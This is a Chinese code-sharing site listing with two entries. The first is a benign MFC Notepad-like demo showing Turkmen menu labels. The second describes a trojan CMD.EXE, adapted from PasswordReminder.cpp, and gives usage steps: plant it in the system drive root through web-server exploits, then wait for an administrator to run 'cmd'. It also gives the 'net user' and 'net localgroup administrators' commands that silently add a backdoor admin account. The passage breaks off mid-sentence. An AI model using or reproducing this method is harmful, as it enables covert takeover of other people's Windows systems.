This simple SDI Notepad-like application demonstrates how, taking advantage of the MFC support for UNICODE, to Turkmenize labels of the specified menu items. Actually, Turkmen is not supported by Windows 2000, therefore, to create such resources as menu so that strings in Turkmen could be displayed I had to invent an additional technique 這是一個與記事本類似的簡單的SDI應用程序,演示了怎樣使用MFC來支持 UNICODE,對指定的菜單條目進行Turkmenize標簽化。實際上,Windwos 2000并不支持Turknen,因此,創建了那些菜單資源以便那些字符串可以在Turknen中顯示,為此我必須開發其它的技術。 來源: http://www.codeguru.com/advancedui/SDI_Note.html
標簽:
Notepad-like
demonstrates
application
advantage
上傳時間:
2013-11-26
上傳用戶:txfyddz
你是不是經常在開始菜單的運行窗口里運行命令呢? 看看這個漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在執行搜索的時候, 首先查找根目錄 而開始菜單的運行窗口里執行命令, 也是首先在系統盤的根目錄里進行查找. 這個漏洞其實是已經是公開的秘密了. 既然現在作為漏洞公布出來, 我也就把網上的PasswordReminder.cpp拿來改了改 加了一個加超級管理員用戶和執行cmd.exe的功能. 使用方法: 把程序解壓, 把壓縮包里的文件 CMD.EXE (該文件具有隱藏和只讀屬性) 釋放到目標機器的系統盤根目錄, 一般都是在C:比如利用UNICODE/Decode漏洞就有寫根目錄的權限, 同時Asp/fp30reg.dll等遠程溢出出來的Shell, 一般都只有匿名權限, 但是它具有寫根目錄的權限 這個時候, 就可以把本程序放到目標機器的系統盤根目錄 只要等管理員在機器的開始菜單里運行命令: cmd 一切盡在掌握中.:) PS: 系統執行后, 會先產生一個線程來做一些處理 然后用system()函數調用cmd.exe來讓用戶能夠執行命令. 產生出來的線程會產生兩個進程序執行如下兩個命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 這樣就在系統上增加了一個超級
標簽:
964057
zdnet
http
2100
上傳時間:
2015-01-12
上傳用戶:qlpqlq